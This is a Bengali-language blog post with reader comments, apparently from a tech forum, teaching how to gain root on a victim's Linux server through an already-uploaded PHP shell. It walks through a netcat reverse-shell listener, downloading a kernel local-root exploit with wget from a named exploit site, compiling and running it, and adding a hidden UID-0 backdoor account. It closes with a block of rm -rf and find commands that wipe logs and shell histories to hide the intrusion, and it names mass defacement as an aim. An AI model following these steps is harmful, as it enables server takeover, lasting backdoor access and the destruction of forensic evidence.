rashed rahul
Latest posts by rashed rahul (see all)
আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।
সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে আপনার উইন্ডোজ পিসি দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।
কাজের ধারা >>>>
যা যা লাগবে
> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT
Step 1 – Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।
এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল
2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি exploit-db, 1337day, th3-0utl4ws এসব সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 – Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না …… গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit “Enter”
এই কাজ কিন্তু cmd তে করতে হবে
তাহলে এটি রিপ্লাই দেবে এরকম “listening on [any] 443 …”
এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি “BackConnect function” পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন
এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
Step 3 – Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using ‘wget’ function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি । এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits…8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক টাইপ করুন । তাহলে এটি সার্ভারে “2.6.18-164.zip” নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।
আপনি যদি এক্সপ্লইট কে যে কোন নাম যেমন anyrandomname.zip ডাউনলোড করেন তাহলে টাইপ করুন
unzip anyrandomname.zip
এখন আপনি আপনার এক্সপ্লইট পাবেন (Like mine “2.6.18-164”)
এখন সবগুল ধাপ সম্পন্ন করার পর ……………………….
Type:chmod 777 yourexploit’sname
আমি যেখানে your exploit লিখলাম সেখানে আপনি নিজের টা লিখবেন
এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit’sname
To check if you got root type
id
or
whoami
Step 4 – Adding root user
মানে আসল অ্যাডমিন ছাড়া অন্যদের এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
কম্যান্ড এর ব্যাখা
Quote:adduser – এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়
-u 0 -o – Set the value of user id to 0.
-g 0 – Set the initial group number or name to 0
-G 0,1,2,3,4,6,10 – Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M – ‘home directory’ not created for the user.
root2 – এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি ইচ্ছা মত নাম দিতে পারেন
Now you need to set a password for your username.
Type in next:
passwd Root2
(Root2 is your username)
একটি উদাহরণ দেখুন
[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
আপনি ঠিকমত করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন
id root2
(Root2 is your username)
GNY shell – http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat – এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/
Clearing Logs:
এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name “log*” -exec rm -rf {} \;
শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু > http://www.facebook.com/CY133R এ
আর আমি > http://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
……………………………………………………………….10%3∞ …………………………………………………………..
নিচের টিউনগুলো লখ্য করুন, কাজে লাগতেও পারে
আশা করি পোর্ট ফরওয়ার্ডিং নিয়া এরকম একটা পোস্ট দিবেন :)
বাহ দারুন টিউন, অনেক ধন্যবাদ আপনাকে.
চরম…
ফাটা ফাটি পোস্ট।
চমৎকার টিউন সত্যি দারুন হয়েছে।
লিঙ্ক আপনি অরিজিনাল টাই দিয়েছিলেন। অনেক আগে অই লিঙ্ক টা কাজ করত। এখন করে না। সাইট বন্ধ। আমার লিঙ্ক এর দরকার নাই। কালেকশন অনেক আছে। :)
ভালো কিছু জানতে পেলাম। ধন্যবাদ
সবাইকে ধন্যবাদ
@ ডার্ক VORTEX
দেখুন এখানে তো আমি আপনাকে লোকাল এক্সপ্লইট লিঙ্ক দিয়ে দেব না……
এটা কে উদাহরণ হিসেবে নিতে পারেন………। তাই আপনি আপনার নিজের টা তৈরি করবেন । আশা করি বুঝতে পেরেছেন
সুন্দোর পোস্ট :)
আপনার এক্সপ্লইট অ্যাড্রেস রিনিউ করেন। লিঙ্ক এক্সপায়ার হয়ে গাছে :)
সুন্দর পোস্ট করেছেন। কিন্তু এখন লোকাল রুট আপনি যেটা দিছেন। সেটা কাজ করবে না। এখন কারনাল ভার্সন ২.৬.৩৬। নতুন এক্সপ্লইট পোস্ট করেন। তাহলে টিউটোরিয়াল তা সম্পূর্ণ হবে :)।
খুব সুন্দর , চালিয়ে যান সাথেই আছি । ।। । :D :দ